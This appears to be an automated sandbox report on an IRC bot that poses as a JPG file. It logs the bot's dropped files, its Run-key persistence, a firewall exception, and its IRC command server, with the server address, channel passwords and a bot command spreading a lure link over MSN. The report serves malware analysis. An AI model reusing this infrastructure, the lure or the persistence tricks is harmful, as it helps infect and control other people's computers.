HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "ScriptOk"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "InstallRoot"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "CLRLoadLogDir"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "OnlyUseLatestCLR"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NETFramework\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NETFramework\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib "EventLogLevel"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib "TotalInstanceName"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "DisplayHeapPerfObject"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "ProcessNameFormat"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "ThreadNameFormat"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PSched\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PSched\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "10"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders "SecurityProviders"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RSVP\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RSVP\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony "Perf1"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony "Perf2"
HKEY_PERFORMANCE_DATA "230 784"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "InstallRoot"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "CLRLoadLogDir"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "OnlyUseLatestCLR"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NETFramework\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NETFramework\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib "EventLogLevel"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib "TotalInstanceName"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "DisplayHeapPerfObject"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "ProcessNameFormat"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "ThreadNameFormat"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PSched\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PSched\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "10"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders "SecurityProviders"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RSVP\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RSVP\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony "Perf1"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony "Perf2"
HKEY_PERFORMANCE_DATA "230 784"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"
Enums
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy
File Changes by all processes
New Files
c:\images000123jpg.exe
C:\WINDOWS\CIMBOT.EXE
C:\WINDOWS\IMBOT.EXE
\Device\Tcp
\Device\Ip
\Device\Ip
\Device\Gpc
\Device\Tcp6
C:\WINDOWS\WINRAR2.exe
\Device\Tcp
\Device\Ip
\Device\Ip
\Device\Gpc
\Device\Tcp6
\Device\RasAcd
Opened Files
C:\WINDOWS\Registration\R000000000007.clb
C:\WINDOWS\system32\de-DE\wshom.ocx.mui
C:\WINDOWS\system32\wshom.ocx
C:\WINDOWS\system32\stdole2.tlb
C:\WINDOWS\CIMBOT.EXE
\\.\PIPE\wkssvc
\\.\PIPE\lsarpc
C:\Programme\Windows Desktop Search\MSNLNamespaceMgr.dll
C:\WINDOWS\Registration\R000000000007.clb
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\
C:\WINDOWS\IMBOT.EXE.config
C:\WINDOWS\IMBOT.EXE
\\.\Ip
\\.\PIPE\EVENTLOG
\\.\PIPE\ROUTER
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\
C:\WINDOWS\WINRAR2.exe.config
C:\WINDOWS\WINRAR2.exe
\\.\Ip
\\.\PIPE\EVENTLOG
\\.\PIPE\ROUTER
C:\WINDOWS\WINRAR2.exe
Deleted Files
C:\WINDOWS\CIMBOT.EXE
Chronological Order
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\de-DE\wshom.ocx.mui (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\wshom.ocx (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\stdole2.tlb (OPEN_EXISTING)
Create/Open File: c:\images000123jpg.exe (OPEN_ALWAYS)
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Create File: C:\WINDOWS\CIMBOT.EXE
Open File: C:\WINDOWS\CIMBOT.EXE (OPEN_EXISTING)
Create File: C:\WINDOWS\IMBOT.EXE
Delete File: C:\WINDOWS\CIMBOT.EXE
Open File: \\.\PIPE\wkssvc (OPEN_EXISTING)
Get File Attributes: c:\ Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\IMBOT.EXE Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\ Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Get File Attributes: C:\Dokumente und Einstellungen\Administrator\Eigene Dateien\desktop.ini Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\Dokumente und Einstellungen\All Users\Dokumente\desktop.ini Flags: (SECURITY_ANONYMOUS)
Open File: C:\Programme\Windows Desktop Search\MSNLNamespaceMgr.dll (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\IMBOT.EXE:Zone.Identifier Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\IMBOT.EXE
Get File Attributes: C:\WINDOWS\system32\mscoree.dll.local Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\IMBOT.EXE.config (OPEN_EXISTING)
Open File: C:\WINDOWS\IMBOT.EXE (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727 Flags: (SECURITY_ANONYMOUS)
Find File: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Create/Open File: \Device\Gpc (OPEN_ALWAYS)
Create/Open File: \Device\Tcp6 (OPEN_ALWAYS)
Open File: \\.\PIPE\EVENTLOG (OPEN_EXISTING)
Open File: \\.\PIPE\ROUTER (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\WINRAR2.exe Flags: (SECURITY_ANONYMOUS)
Copy File: C:\WINDOWS\IMBOT.EXE to C:\WINDOWS\WINRAR2.exe
Set File Attributes: C:\WINDOWS\WINRAR2.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\WINRAR2.exe
Get File Attributes: C:\WINDOWS\system32\mscoree.dll.local Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\WINRAR2.exe.config (OPEN_EXISTING)
Open File: C:\WINDOWS\WINRAR2.exe (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727 Flags: (SECURITY_ANONYMOUS)
Find File: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Create/Open File: \Device\Gpc (OPEN_ALWAYS)
Create/Open File: \Device\Tcp6 (OPEN_ALWAYS)
Open File: \\.\PIPE\EVENTLOG (OPEN_EXISTING)
Open File: \\.\PIPE\ROUTER (OPEN_EXISTING)
Create/Open File: \Device\RasAcd (OPEN_ALWAYS)
Open File: C:\WINDOWS\WINRAR2.exe (OPEN_EXISTING)
* C&C Server: 93.190.138.202:6667
* Server Password:
* Username: ryatoaj
* Nickname: [DEU|XP|516568]
* Channel: #!x!# (Password: cih4n1313)
* Channeltopic: :
* C&C Server: 93.190.138.202:6667
* Server Password:
* Username: XP-4392
* Nickname: [00|DEU|636610]
* Channel: #x# (Password: hacimackackac)
* Channeltopic: :.msn.stop|.msn.msg þu resme bi bakarmýsýn (yemekteyim) http://www.facebookbul.co.cc/images.php?=resim166-jpeg?=
* C&C Server: 93.190.138.202:6667
* Server Password:
* Username: aLeyna_yarak-istiyor
* Nickname: sevgi
* Channel: #X (Password: s1k1k)
* Channeltopic: :FFF
Registry Changes by all processes
Create or Open
Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Windows Services" = WINRAR2.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run "Windows Services" = WINRAR2.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\WINDOWS\IMBOT.EXE" = C:\WINDOWS\IMBOT.EXE:*:Enabled:Windows Services
Reads
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0\0 "win32"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 "win32"
HKEY_CURRENT_USER\Software\Microsoft\Visual Basic\6.0 "AllowUnsafeObjectPassing"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography "MachineGuid"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\AppCompatibility "DisableAppCompat"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56F9679E-7826-4C84-81F3-532071A8BCC5}\InprocServer32 ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers\File\0 "ProgID"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\file "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Mapi "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Outlookexpress "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\OTFS "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "ScriptOk"
